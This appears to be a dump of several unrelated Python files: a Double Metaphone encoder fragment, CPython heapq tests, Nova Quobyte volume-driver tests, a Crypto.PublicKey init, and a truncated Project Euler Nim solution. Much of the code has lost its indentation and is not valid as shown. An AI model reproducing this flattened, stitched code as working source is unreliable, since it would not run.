next = ('X', 2)
# italian & armenian
elif text[pos:pos + 3] in ["SIO", "SIA"] or text[pos:pos + 4] == 'SIAN':
if not slavo_germanic:
next = ('S', 'X', 3)
else:
next = ('S', 3)
# german & anglicisations, e.g. 'smith' match 'schmidt', 'snider' match 'schneider'
# also, -sz- in Slavic languages, although in Hungarian it is pronounced 's'
elif (pos == first and text[pos + 1] in ["M", "N", "L", "W"]) or text[pos + 1] == 'Z':
next = ('S', 'X')
if text[pos + 1] == 'Z':
next = next + (2,)
else:
next = next + (1,)
elif text[pos:pos + 2] == 'SC':
# Schlesinger's rule
if text[pos + 2] == 'H':
# dutch origin, e.g. 'school', 'schooner'
if text[pos + 3:pos + 5] in ["OO", "ER", "EN", "UY", "ED", "EM"]:
# 'schermerhorn', 'schenker'
if text[pos + 3:pos + 5] in ['ER', 'EN']:
next = ('X', 'SK', 3)
else:
next = ('SK', 3)
else:
if pos == first and text[first + 3] not in vowels and text[first + 3] != 'W':
next = ('X', 'S', 3)
else:
next = ('X', 3)
elif text[pos + 2] in ['I', 'E', 'Y']:
next = ('S', 3)
else:
next = ('SK', 3)
# french e.g. 'resnais', 'artois'
elif pos == last and text[pos - 2:pos] in ['AI', 'OI']:
next = ('', 'S', 1)
else:
next = ('S',)
if text[pos + 1] in ['S', 'Z']:
next = next + (2,)
else:
next = next + (1,)
elif ch == 'T':
if text[pos:pos + 4] == 'TION':
next = ('X', 3)
elif text[pos:pos + 3] in ['TIA', 'TCH']:
next = ('X', 3)
elif text[pos:pos + 2] == 'TH' or text[pos:pos + 3] == 'TTH':
# special case 'thomas', 'thames' or germanic
if text[pos + 2:pos + 4] in ['OM', 'AM'] or text[first:first + 4] in ['VON ', 'VAN '] \
or text[first:first + 3] == 'SCH':
next = ('T', 2)
else:
next = ('0', 'T', 2)
elif text[pos + 1] in ['T', 'D']:
next = ('T', 2)
else:
next = ('T', 1)
elif ch == 'V':
if text[pos + 1] == 'V':
next = ('F', 2)
else:
next = ('F', 1)
elif ch == 'W':
# can also be in middle of word
if text[pos:pos + 2] == 'WR':
next = ('R', 2)
elif pos == first and (text[pos + 1] in vowels or text[pos:pos + 2] == 'WH'):
# Wasserman should match Vasserman
if text[pos + 1] in vowels:
next = ('A', 'F', 1)
else:
next = ('A', 1)
# Arnow should match Arnoff
elif (pos == last and text[pos - 1] in vowels) \
or text[pos - 1:pos + 5] in ["EWSKI", "EWSKY", "OWSKI", "OWSKY"] \
or text[first:first + 3] == 'SCH':
next = ('', 'F', 1)
# polish e.g. 'filipowicz'
elif text[pos:pos + 4] in ["WICZ", "WITZ"]:
next = ('TS', 'FX', 4)
else: # default is to skip it
next = (None, 1)
elif ch == 'X':
# french e.g. breaux
next = (None,)
if not(pos == last and (text[pos - 3:pos] in ["IAU", "EAU"] \
or text[pos - 2:pos] in ['AU', 'OU'])):
next = ('KS',)
if text[pos + 1] in ['C', 'X']:
next = next + (2,)
else:
next = next + (1,)
elif ch == 'Z':
# chinese pinyin e.g. 'zhao'
if text[pos + 1] == 'H':
next = ('J',)
elif text[pos + 1:pos + 3] in ["ZO", "ZI", "ZA"] \
or (slavo_germanic and pos > first and text[pos - 1] != 'T'):
next = ('S', 'TS')
else:
next = ('S',)
if text[pos + 1] == 'Z':
next = next + (2,)
else:
next = next + (1,)
else:
next = (None, 1)
if len(next) == 2:
if next[0]:
primary += next[0]
secondary += next[0]
pos += next[1]
elif len(next) == 3:
if next[0]:
primary += next[0]
if next[1]:
secondary += next[1]
pos += next[2]
if primary == secondary:
return (primary, None)
else:
return (primary, secondary)
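# A minimal usage sketch (not part of the original module): each call
# returns a (primary, secondary) tuple, with secondary equal to None
# whenever both encodings agree.
if __name__ == "__main__":
    for word in ("Thompson", "Thames", "Schmidt"):
        print(word, double_metaphone(word))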
|
eckucukoglu/arm-linux-gnueabihf
|
refs/heads/master
|
lib/python2.7/test/test_heapq.py
|
42
|
"""Unittests for heapq."""
import sys
import random
from test import test_support
from unittest import TestCase, skipUnless
py_heapq = test_support.import_fresh_module('heapq', blocked=['_heapq'])
c_heapq = test_support.import_fresh_module('heapq', fresh=['_heapq'])
# _heapq.nlargest/nsmallest are saved in heapq._nlargest/_nsmallest when
# _heapq is imported, so check them there
func_names = ['heapify', 'heappop', 'heappush', 'heappushpop',
'heapreplace', '_nlargest', '_nsmallest']
class TestModules(TestCase):
def test_py_functions(self):
for fname in func_names:
self.assertEqual(getattr(py_heapq, fname).__module__, 'heapq')
@skipUnless(c_heapq, 'requires _heapq')
def test_c_functions(self):
for fname in func_names:
self.assertEqual(getattr(c_heapq, fname).__module__, '_heapq')
class TestHeap(TestCase):
module = None
def test_push_pop(self):
# 1) Push 256 random numbers and pop them off, verifying all's OK.
heap = []
data = []
self.check_invariant(heap)
for i in range(256):
item = random.random()
data.append(item)
self.module.heappush(heap, item)
self.check_invariant(heap)
results = []
while heap:
item = self.module.heappop(heap)
self.check_invariant(heap)
results.append(item)
data_sorted = data[:]
data_sorted.sort()
self.assertEqual(data_sorted, results)
# 2) Check that the invariant holds for a sorted array
self.check_invariant(results)
self.assertRaises(TypeError, self.module.heappush, [])
try:
self.assertRaises(TypeError, self.module.heappush, None, None)
self.assertRaises(TypeError, self.module.heappop, None)
except AttributeError:
pass
def check_invariant(self, heap):
# Check the heap invariant.
for pos, item in enumerate(heap):
if pos: # pos 0 has no parent
parentpos = (pos-1) >> 1
self.assertTrue(heap[parentpos] <= item)
def test_heapify(self):
for size in range(30):
heap = [random.random() for dummy in range(size)]
self.module.heapify(heap)
self.check_invariant(heap)
self.assertRaises(TypeError, self.module.heapify, None)
def test_naive_nbest(self):
data = [random.randrange(2000) for i in range(1000)]
heap = []
for item in data:
self.module.heappush(heap, item)
if len(heap) > 10:
self.module.heappop(heap)
heap.sort()
self.assertEqual(heap, sorted(data)[-10:])
def heapiter(self, heap):
# An iterator returning a heap's elements, smallest-first.
try:
while 1:
yield self.module.heappop(heap)
except IndexError:
pass
def test_nbest(self):
# Less-naive "N-best" algorithm, much faster (if len(data) is big
# enough <wink>) than sorting all of data. However, if we had a max
# heap instead of a min heap, it could go faster still via
# heapify'ing all of data (linear time), then doing 10 heappops
# (10 log-time steps).
data = [random.randrange(2000) for i in range(1000)]
heap = data[:10]
self.module.heapify(heap)
for item in data[10:]:
if item > heap[0]: # this gets rarer the longer we run
self.module.heapreplace(heap, item)
self.assertEqual(list(self.heapiter(heap)), sorted(data)[-10:])
self.assertRaises(TypeError, self.module.heapreplace, None)
self.assertRaises(TypeError, self.module.heapreplace, None, None)
self.assertRaises(IndexError, self.module.heapreplace, [], None)
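    # Sketch of the max-heap variant described in test_nbest (hypothetical
    # helper, not part of the original suite): simulate a max heap by
    # negating values, heapify in linear time, then pop the n largest.
    def nbest_via_max_heap(self, data, n=10):
        neg = [-item for item in data]
        self.module.heapify(neg)
        return sorted(-self.module.heappop(neg) for _ in range(n))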
def test_nbest_with_pushpop(self):
data = [random.randrange(2000) for i in range(1000)]
heap = data[:10]
self.module.heapify(heap)
for item in data[10:]:
self.module.heappushpop(heap, item)
self.assertEqual(list(self.heapiter(heap)), sorted(data)[-10:])
self.assertEqual(self.module.heappushpop([], 'x'), 'x')
def test_heappushpop(self):
h = []
x = self.module.heappushpop(h, 10)
self.assertEqual((h, x), ([], 10))
h = [10]
x = self.module.heappushpop(h, 10.0)
self.assertEqual((h, x), ([10], 10.0))
self.assertEqual(type(h[0]), int)
self.assertEqual(type(x), float)
h = [10]
x = self.module.heappushpop(h, 9)
self.assertEqual((h, x), ([10], 9))
h = [10]
x = self.module.heappushpop(h, 11)
self.assertEqual((h, x), ([11], 10))
def test_heapsort(self):
# Exercise everything with repeated heapsort checks
for trial in xrange(100):
size = random.randrange(50)
data = [random.randrange(25) for i in range(size)]
if trial & 1: # Half of the time, use heapify
heap = data[:]
self.module.heapify(heap)
else: # The rest of the time, use heappush
heap = []
for item in data:
self.module.heappush(heap, item)
heap_sorted = [self.module.heappop(heap) for i in range(size)]
self.assertEqual(heap_sorted, sorted(data))
def test_merge(self):
inputs = []
for i in xrange(random.randrange(5)):
row = sorted(random.randrange(1000) for j in range(random.randrange(10)))
inputs.append(row)
self.assertEqual(sorted(chain(*inputs)), list(self.module.merge(*inputs)))
self.assertEqual(list(self.module.merge()), [])
def test_merge_stability(self):
class Int(int):
pass
inputs = [[], [], [], []]
for i in range(20000):
stream = random.randrange(4)
x = random.randrange(500)
obj = Int(x)
obj.pair = (x, stream)
inputs[stream].append(obj)
for stream in inputs:
stream.sort()
result = [i.pair for i in self.module.merge(*inputs)]
self.assertEqual(result, sorted(result))
def test_nsmallest(self):
data = [(random.randrange(2000), i) for i in range(1000)]
for f in (None, lambda x: x[0] * 547 % 2000):
for n in (0, 1, 2, 10, 100, 400, 999, 1000, 1100):
self.assertEqual(self.module.nsmallest(n, data), sorted(data)[:n])
self.assertEqual(self.module.nsmallest(n, data, key=f),
sorted(data, key=f)[:n])
def test_nlargest(self):
data = [(random.randrange(2000), i) for i in range(1000)]
for f in (None, lambda x: x[0] * 547 % 2000):
for n in (0, 1, 2, 10, 100, 400, 999, 1000, 1100):
self.assertEqual(self.module.nlargest(n, data),
sorted(data, reverse=True)[:n])
self.assertEqual(self.module.nlargest(n, data, key=f),
sorted(data, key=f, reverse=True)[:n])
def test_comparison_operator(self):
# Issue 3051: Make sure heapq works with both __lt__ and __le__
def hsort(data, comp):
data = map(comp, data)
self.module.heapify(data)
return [self.module.heappop(data).x for i in range(len(data))]
class LT:
def __init__(self, x):
self.x = x
def __lt__(self, other):
return self.x > other.x
class LE:
def __init__(self, x):
self.x = x
def __le__(self, other):
return self.x >= other.x
data = [random.random() for i in range(100)]
target = sorted(data, reverse=True)
self.assertEqual(hsort(data, LT), target)
self.assertEqual(hsort(data, LE), target)
class TestHeapPython(TestHeap):
module = py_heapq
@skipUnless(c_heapq, 'requires _heapq')
class TestHeapC(TestHeap):
module = c_heapq
#==============================================================================
class LenOnly:
"Dummy sequence class defining __len__ but not __getitem__."
def __len__(self):
return 10
class GetOnly:
"Dummy sequence class defining __getitem__ but not __len__."
def __getitem__(self, ndx):
return 10
class CmpErr:
"Dummy element that always raises an error during comparison"
def __cmp__(self, other):
raise ZeroDivisionError
def R(seqn):
'Regular generator'
for i in seqn:
yield i
class G:
'Sequence using __getitem__'
def __init__(self, seqn):
self.seqn = seqn
def __getitem__(self, i):
return self.seqn[i]
class I:
'Sequence using iterator protocol'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class Ig:
'Sequence using iterator protocol defined with a generator'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
for val in self.seqn:
yield val
class X:
'Missing __getitem__ and __iter__'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def next(self):
if self.i >= len(self.seqn): raise StopIteration
v = self.seqn[self.i]
self.i += 1
return v
class N:
'Iterator missing next()'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
class E:
'Test propagation of exceptions'
def __init__(self, seqn):
self.seqn = seqn
self.i = 0
def __iter__(self):
return self
def next(self):
3 // 0
class S:
'Test immediate stop'
def __init__(self, seqn):
pass
def __iter__(self):
return self
def next(self):
raise StopIteration
from itertools import chain, imap
def L(seqn):
'Test multiple tiers of iterators'
return chain(imap(lambda x:x, R(Ig(G(seqn)))))
class SideEffectLT:
def __init__(self, value, heap):
self.value = value
self.heap = heap
def __lt__(self, other):
self.heap[:] = []
return self.value < other.value
class TestErrorHandling(TestCase):
module = None
def test_non_sequence(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises((TypeError, AttributeError), f, 10)
for f in (self.module.heappush, self.module.heapreplace,
self.module.nlargest, self.module.nsmallest):
self.assertRaises((TypeError, AttributeError), f, 10, 10)
def test_len_only(self):
for f in (self.module.heapify, self.module.heappop):
self.assertRaises((TypeError, AttributeError), f, LenOnly())
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises((TypeError, AttributeError), f, LenOnly(), 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(TypeError, f, 2, LenOnly())
def test_get_only(self):
seq = [CmpErr(), CmpErr(), CmpErr()]
for f in (self.module.heapify, self.module.heappop):
self.assertRaises(ZeroDivisionError, f, seq)
for f in (self.module.heappush, self.module.heapreplace):
self.assertRaises(ZeroDivisionError, f, seq, 10)
for f in (self.module.nlargest, self.module.nsmallest):
self.assertRaises(ZeroDivisionError, f, 2, seq)
def test_arg_parsing(self):
for f in (self.module.heapify, self.module.heappop,
self.module.heappush, self.module.heapreplace,
self.module.nlargest, self.module.nsmallest):
self.assertRaises((TypeError, AttributeError), f, 10)
def test_iterable_args(self):
for f in (self.module.nlargest, self.module.nsmallest):
for s in ("123", "", range(1000), ('do', 1.2), xrange(2000,2200,5)):
for g in (G, I, Ig, L, R):
with test_support.check_py3k_warnings(
("comparing unequal types not supported",
DeprecationWarning), quiet=True):
self.assertEqual(f(2, g(s)), f(2,s))
self.assertEqual(f(2, S(s)), [])
self.assertRaises(TypeError, f, 2, X(s))
self.assertRaises(TypeError, f, 2, N(s))
self.assertRaises(ZeroDivisionError, f, 2, E(s))
# Issue #17278: the heap may change size while it's being walked.
def test_heappush_mutating_heap(self):
heap = []
heap.extend(SideEffectLT(i, heap) for i in range(200))
# Python version raises IndexError, C version RuntimeError
with self.assertRaises((IndexError, RuntimeError)):
self.module.heappush(heap, SideEffectLT(5, heap))
def test_heappop_mutating_heap(self):
heap = []
heap.extend(SideEffectLT(i, heap) for i in range(200))
# Python version raises IndexError, C version RuntimeError
with self.assertRaises((IndexError, RuntimeError)):
self.module.heappop(heap)
class TestErrorHandlingPython(TestErrorHandling):
module = py_heapq
@skipUnless(c_heapq, 'requires _heapq')
class TestErrorHandlingC(TestErrorHandling):
module = c_heapq
#==============================================================================
def test_main(verbose=None):
test_classes = [TestModules, TestHeapPython, TestHeapC,
TestErrorHandlingPython, TestErrorHandlingC]
test_support.run_unittest(*test_classes)
# verify reference counting
if verbose and hasattr(sys, "gettotalrefcount"):
import gc
counts = [None] * 5
for i in xrange(len(counts)):
test_support.run_unittest(*test_classes)
gc.collect()
counts[i] = sys.gettotalrefcount()
print counts
if __name__ == "__main__":
test_main(verbose=True)
|
jianghuaw/nova
|
refs/heads/master
|
nova/tests/unit/virt/libvirt/volume/test_quobyte.py
|
2
|
# Copyright (c) 2015 Quobyte Inc.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Unit tests for the Quobyte volume driver module."""
import os
import traceback
import mock
from oslo_concurrency import processutils
from oslo_utils import fileutils
import psutil
import six
from nova import exception as nova_exception
from nova import test
from nova.tests.unit.virt.libvirt.volume import test_volume
from nova import utils
from nova.virt.libvirt import utils as libvirt_utils
from nova.virt.libvirt.volume import quobyte
class QuobyteTestCase(test.NoDBTestCase):
"""Tests the nova.virt.libvirt.volume.quobyte module utilities."""
TEST_MNT_POINT = mock.sentinel.TEST_MNT_POINT
def assertRaisesAndMessageMatches(
self, excClass, msg, callableObj, *args, **kwargs):
"""Ensure that the specified exception was raised. """
caught = False
try:
callableObj(*args, **kwargs)
except Exception as exc:
caught = True
self.assertIsInstance(exc, excClass,
'Wrong exception caught: %s Stacktrace: %s' %
(exc, traceback.format_exc()))
self.assertIn(msg, six.text_type(exc))
if not caught:
self.fail('Expected raised exception but nothing caught.')
def get_mock_partitions(self):
mypart = mock.Mock()
mypart.device = "quobyte@"
mypart.mountpoint = self.TEST_MNT_POINT
return [mypart]
@mock.patch.object(os.path, "exists", return_value=False)
@mock.patch.object(fileutils, "ensure_tree")
@mock.patch.object(utils, "execute")
def test_quobyte_mount_volume_not_systemd(self, mock_execute,
mock_ensure_tree,
mock_exists):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
quobyte.mount_volume(quobyte_volume, export_mnt_base)
mock_ensure_tree.assert_called_once_with(export_mnt_base)
expected_commands = [mock.call('mount.quobyte',
'--disable-xattrs',
quobyte_volume,
export_mnt_base)
]
mock_execute.assert_has_calls(expected_commands)
mock_exists.assert_called_once_with(" /run/systemd/system")
@mock.patch.object(os.path, "exists", return_value=True)
@mock.patch.object(fileutils, "ensure_tree")
@mock.patch.object(utils, "execute")
def test_quobyte_mount_volume_systemd(self, mock_execute,
mock_ensure_tree,
mock_exists):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
quobyte.mount_volume(quobyte_volume, export_mnt_base)
mock_ensure_tree.assert_called_once_with(export_mnt_base)
expected_commands = [mock.call('systemd-run',
'--scope',
'--user',
'mount.quobyte',
'--disable-xattrs',
quobyte_volume,
export_mnt_base)
]
mock_execute.assert_has_calls(expected_commands)
mock_exists.assert_called_once_with(" /run/systemd/system")
@mock.patch.object(os.path, "exists", return_value=False)
@mock.patch.object(fileutils, "ensure_tree")
@mock.patch.object(utils, "execute")
def test_quobyte_mount_volume_with_config(self,
mock_execute,
mock_ensure_tree,
mock_exists):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
config_file_dummy = "/etc/quobyte/dummy.conf"
quobyte.mount_volume(quobyte_volume,
export_mnt_base,
config_file_dummy)
mock_ensure_tree.assert_called_once_with(export_mnt_base)
expected_commands = [mock.call('mount.quobyte',
'--disable-xattrs',
quobyte_volume,
export_mnt_base,
'-c',
config_file_dummy)
]
mock_execute.assert_has_calls(expected_commands)
mock_exists.assert_called_once_with(" /run/systemd/system")
@mock.patch.object(fileutils, "ensure_tree")
@mock.patch.object(utils, "execute",
side_effect=(processutils.
ProcessExecutionError))
def test_quobyte_mount_volume_fails(self, mock_execute, mock_ensure_tree):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
self.assertRaises(processutils.ProcessExecutionError,
quobyte.mount_volume,
quobyte_volume,
export_mnt_base)
@mock.patch.object(utils, "execute")
def test_quobyte_umount_volume(self, mock_execute):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
quobyte.umount_volume(export_mnt_base)
mock_execute.assert_called_once_with('umount.quobyte',
export_mnt_base)
@mock.patch.object(quobyte.LOG, "error")
@mock.patch.object(utils, "execute")
def test_quobyte_umount_volume_warns(self,
mock_execute,
mock_debug):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
def exec_side_effect(*cmd, **kwargs):
exerror = processutils.ProcessExecutionError(
"Device or resource busy")
raise exerror
mock_execute.side_effect = exec_side_effect
quobyte.umount_volume(export_mnt_base)
(mock_debug.
assert_called_once_with("The Quobyte volume at %s is still in use.",
export_mnt_base))
@mock.patch.object(quobyte.LOG, "exception")
@mock.patch.object(utils, "execute",
side_effect=(processutils.ProcessExecutionError))
def test_quobyte_umount_volume_fails(self,
mock_execute,
mock_exception):
mnt_base = '/mnt'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
quobyte.umount_volume(export_mnt_base)
(mock_exception.
assert_called_once_with("Couldn't unmount "
"the Quobyte Volume at %s",
export_mnt_base))
@mock.patch.object(psutil, "disk_partitions")
@mock.patch.object(os, "stat")
def test_validate_volume_all_good(self, stat_mock, part_mock):
part_mock.return_value = self.get_mock_partitions()
drv = quobyte
def statMockCall(*args):
if args[0] == self.TEST_MNT_POINT:
stat_result = mock.Mock()
stat_result.st_size = 0
return stat_result
return os.stat(args)
stat_mock.side_effect = statMockCall
drv.validate_volume(self.TEST_MNT_POINT)
stat_mock.assert_called_once_with(self.TEST_MNT_POINT)
part_mock.assert_called_once_with(all=True)
@mock.patch.object(psutil, "disk_partitions")
@mock.patch.object(os, "stat")
def test_validate_volume_mount_not_working(self, stat_mock, part_mock):
part_mock.return_value = self.get_mock_partitions()
drv = quobyte
def statMockCall(*args):
print (args)
if args[0] == self.TEST_MNT_POINT:
raise nova_exception.InvalidVolume()
stat_mock.side_effect = [os.stat, statMockCall]
self.assertRaises(
excClass=nova_exception.InvalidVolume,
callableObj=drv.validate_volume,
mount_path=self.TEST_MNT_POINT)
stat_mock.assert_called_with(self.TEST_MNT_POINT)
part_mock.assert_called_once_with(all=True)
def test_validate_volume_no_mtab_entry(self):
msg = ("No matching Quobyte mount entry for %(mpt)s"
" could be found for validation in partition list."
% {'mpt': self.TEST_MNT_POINT})
self.assertRaisesAndMessageMatches(
nova_exception.InvalidVolume,
msg,
quobyte.validate_volume,
self.TEST_MNT_POINT)
@mock.patch.object(psutil, "disk_partitions")
def test_validate_volume_wrong_mount_type(self, part_mock):
mypart = mock.Mock()
mypart.device = "not-quobyte"
mypart.mountpoint = self.TEST_MNT_POINT
part_mock.return_value = [mypart]
msg = ("The mount %(mpt)s is not a valid"
" Quobyte volume according to partition list."
% {'mpt': self.TEST_MNT_POINT})
self.assertRaisesAndMessageMatches(
nova_exception.InvalidVolume,
msg,
quobyte.validate_volume,
self.TEST_MNT_POINT)
part_mock.assert_called_once_with(all=True)
@mock.patch.object(os, "stat")
@mock.patch.object(psutil, "disk_partitions")
def test_validate_volume_stale_mount(self, part_mock, stat_mock):
part_mock.return_value = self.get_mock_partitions()
def statMockCall(*args):
if args[0] == self.TEST_MNT_POINT:
stat_result = mock.Mock()
stat_result.st_size = 1
return stat_result
return os.stat(args)
stat_mock.side_effect = statMockCall
# As this uses a dir size >0, it raises an exception
self.assertRaises(
nova_exception.InvalidVolume,
quobyte.validate_volume,
self.TEST_MNT_POINT)
part_mock.assert_called_once_with(all=True)
class LibvirtQuobyteVolumeDriverTestCase(
test_volume.LibvirtVolumeBaseTestCase):
"""Tests the LibvirtQuobyteVolumeDriver class."""
@mock.patch.object(quobyte, 'validate_volume')
@mock.patch.object(quobyte, 'mount_volume')
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=False)
def test_libvirt_quobyte_driver_mount(self,
mock_is_mounted,
mock_mount_volume,
mock_validate_volume
):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
file_path = os.path.join(export_mnt_base, self.name)
connection_info = {'data': {'export': export_string,
'name': self.name}}
libvirt_driver.connect_volume(connection_info, self.disk_info,
mock.sentinel.instance)
conf = libvirt_driver.get_config(connection_info, self.disk_info)
tree = conf.format_dom()
self._assertFileTypeEquals(tree, file_path)
mock_mount_volume.assert_called_once_with(quobyte_volume,
export_mnt_base,
mock.ANY)
mock_validate_volume.assert_called_with(export_mnt_base)
@mock.patch.object(quobyte, 'validate_volume')
@mock.patch.object(quobyte, 'umount_volume')
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=True)
def test_libvirt_quobyte_driver_umount(self, mock_is_mounted,
mock_umount_volume,
mock_validate_volume):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
file_path = os.path.join(export_mnt_base, self.name)
connection_info = {'data': {'export': export_string,
'name': self.name}}
libvirt_driver.connect_volume(connection_info, self.disk_info,
mock.sentinel.instance)
conf = libvirt_driver.get_config(connection_info, self.disk_info)
tree = conf.format_dom()
self._assertFileTypeEquals(tree, file_path)
libvirt_driver.disconnect_volume(connection_info, "vde",
mock.sentinel.instance)
mock_validate_volume.assert_called_once_with(export_mnt_base)
mock_umount_volume.assert_called_once_with(export_mnt_base)
@mock.patch.object(quobyte, 'validate_volume')
@mock.patch.object(quobyte, 'umount_volume')
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=True)
def test_libvirt_quobyte_driver_already_mounted(self,
mock_is_mounted,
mock_umount_volume,
mock_validate_volume
):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
quobyte_volume = '192.168.1.1/volume-00001'
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
file_path = os.path.join(export_mnt_base, self.name)
connection_info = {'data': {'export': export_string,
'name': self.name}}
libvirt_driver.connect_volume(connection_info, self.disk_info,
mock.sentinel.instance)
conf = libvirt_driver.get_config(connection_info, self.disk_info)
tree = conf.format_dom()
self._assertFileTypeEquals(tree, file_path)
libvirt_driver.disconnect_volume(connection_info, "vde",
mock.sentinel.instance)
mock_umount_volume.assert_called_once_with(export_mnt_base)
mock_validate_volume.assert_called_once_with(export_mnt_base)
@mock.patch.object(quobyte, 'validate_volume')
@mock.patch.object(quobyte, 'mount_volume')
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=False)
def test_libvirt_quobyte_driver_qcow2(self, mock_is_mounted,
mock_mount_volume,
mock_validate_volume
):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
name = 'volume-00001'
image_format = 'qcow2'
quobyte_volume = '192.168.1.1/volume-00001'
connection_info = {'data': {'export': export_string,
'name': name,
'format': image_format}}
export_mnt_base = os.path.join(mnt_base,
utils.get_hash_str(quobyte_volume))
libvirt_driver.connect_volume(connection_info, self.disk_info,
mock.sentinel.instance)
conf = libvirt_driver.get_config(connection_info, self.disk_info)
tree = conf.format_dom()
self.assertEqual('file', tree.get('type'))
self.assertEqual('qcow2', tree.find('./driver').get('type'))
(mock_mount_volume.
assert_called_once_with('192.168.1.1/volume-00001',
export_mnt_base,
mock.ANY))
mock_validate_volume.assert_called_with(export_mnt_base)
libvirt_driver.disconnect_volume(connection_info, "vde",
mock.sentinel.instance)
@mock.patch.object(libvirt_utils, 'is_mounted', return_value=True)
def test_libvirt_quobyte_driver_mount_non_quobyte_volume(self,
mock_is_mounted):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
connection_info = {'data': {'export': export_string,
'name': self.name}}
def exe_side_effect(*cmd, **kwargs):
if cmd == mock.ANY:
raise nova_exception.NovaException()
with mock.patch.object(quobyte,
'validate_volume') as mock_execute:
mock_execute.side_effect = exe_side_effect
self.assertRaises(nova_exception.NovaException,
libvirt_driver.connect_volume,
connection_info,
self.disk_info,
mock.sentinel.instance)
def test_libvirt_quobyte_driver_normalize_export_with_protocol(self):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = 'quobyte://192.168.1.1/volume-00001'
self.assertEqual("192.168.1.1/volume-00001",
libvirt_driver._normalize_export(export_string))
def test_libvirt_quobyte_driver_normalize_export_without_protocol(self):
mnt_base = '/mnt'
self.flags(quobyte_mount_point_base=mnt_base, group='libvirt')
libvirt_driver = quobyte.LibvirtQuobyteVolumeDriver(self.fake_host)
export_string = '192.168.1.1/volume-00001'
self.assertEqual("192.168.1.1/volume-00001",
libvirt_driver._normalize_export(export_string))
|
flyfei/python-for-android
|
refs/heads/master
|
python-build/python-libs/gdata/src/gdata/Crypto/PublicKey/__init__.py
|
273
|
"""Public-key encryption and signature algorithms.
Public-key encryption uses two different keys, one for encryption and
one for decryption. The encryption key can be made public, and the
decryption key is kept private. Many public-key algorithms can also
be used to sign messages, and some can *only* be used for signatures.
Crypto.PublicKey.DSA Digital Signature Algorithm. (Signature only)
Crypto.PublicKey.ElGamal (Signing and encryption)
Crypto.PublicKey.RSA (Signing, encryption, and blinding)
Crypto.PublicKey.qNEW (Signature only)
"""
__all__ = ['RSA', 'DSA', 'ElGamal', 'qNEW']
__revision__ = "$Id: __init__.py,v 1.4 2003/04/03 20:27:13 akuchling Exp $"
|
TheAlgorithms/Python
|
refs/heads/master
|
project_euler/problem_301/sol1.py
|
1
|
"""
Project Euler Problem 301: https://projecteuler.net/problem=301
Problem Statement:
Nim is a game played with heaps of stones, where two players take
it in turn to remove any number of stones from any heap until no stones remain.
We'll consider the three-heap normal-play version of
Nim, which works as follows:
- At the start of the game there are three heaps of stones.
- On each player's turn, the player may remove any positive
number of stones from any single heap.
- The first player unable to move (because no stones remain) loses.
If (n1, n2, n3) indicates a Nim position consisting of heaps of size
n1, n2, and n3, then there is a simple function, which you may look up
or attempt to deduce for yourself, X(n1, n2, n3) that returns:
- zero if, with perfect strategy, the player about to
move will eventually lose; or
